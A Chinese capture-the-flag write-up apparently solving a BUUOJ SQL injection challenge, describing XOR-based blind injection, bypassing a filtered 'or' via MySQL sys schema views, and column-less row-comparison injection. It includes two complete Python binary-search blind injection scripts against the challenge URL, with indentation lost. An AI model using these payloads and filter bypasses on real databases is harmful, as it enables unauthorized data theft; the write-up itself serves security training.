话不多说,直接注
fuzz一波,发现输入分号和单引号无果,并且过滤了关键字符
猜测整形注入
无果,尝试异或注入
发现可行,这个注入我做的挺多了,就不细说了,具体可以去看我的博文 极客大挑战finalsql
注入的时候发现他过滤or 这样我们的information就不能用了
换成innodb_table_stats绕过也无果
发现sys.x$schema_flattened_keys 或者 sys.schema_table_statistics_with_buffer可以替代上面那个,果然条条道路通罗马
关于绕过详解
查表
import requests
url='http://35737a35-63b7-4e60-a584-e5cbbead6dc6.node3.buuoj.cn/index.php'
#give_grandpa_pa_pa_pa
payload_table='1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1'
flag =''
for i in range(1,100):
low = 32
high = 132
mid = (low + high) //2
while(low < high):
payload = payload_table.format(i,mid)
data={"id": payload}
print(payload)
r = requests.post(url=url,data=data)
if 'Nu1L' in r.text:
low = mid+1
else:
high = mid
mid = (low+high) //2
if(mid ==32 or mid == 127):
break
flag +=chr(mid)
print(flag)
表名如下
f1ag_1s_h3r3_hhhhh,users233333333333333
并且这里还过滤了join,查列就非常困难了
但是这个只能查表,接着就只能用无列名注入了
对构造盲注无列名注入了解的还不够彻底emmmm
无列名注入讲解
这上面是帮助各位理解无列名的
具体参考Y1ng师傅的文章
记下
盲注无列名构造
参考文章
Y1ng师傅参考文献
payload
1^((1,'G')>(select * from f1ag_1s_h3r3_hhhhh))^1
简单说说这个比较吧
如果字符窜第一位的ascii码大于要比较的第一位,那么直接返回真
而我们这个注入只要查值,所以值的ascii码是要减一的
具体的详细解释可以参考上面Y1ng师傅的文章
我这边用了二分法进去,就不用等那么久一遍一遍遍历了
exp如下:
import requests
url='http://35737a35-63b7-4e60-a584-e5cbbead6dc6.node3.buuoj.cn/index.php'
#give_grandpa_pa_pa_pa
payload_flag='1^((1,\'{}\')>(select * from f1ag_1s_h3r3_hhhhh))'
flag =''
for i in range(1,100):
low = 32
high = 132
mid = (low + high) //2
while(low < high):
k = flag+chr(mid)
payload = payload_flag.format(k)
data={"id": payload}
print(payload)
r = requests.post(url=url,data=data)
if 'Nu1L' in r.text:
low = mid+1
else:
high = mid
mid = (low+high) //2
if mid ==33:
break
flag +=chr(mid-1)
print(flag.lower())#因为出来的flag是大写,这边全部转为小写
print(flag.lower())
#
376
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
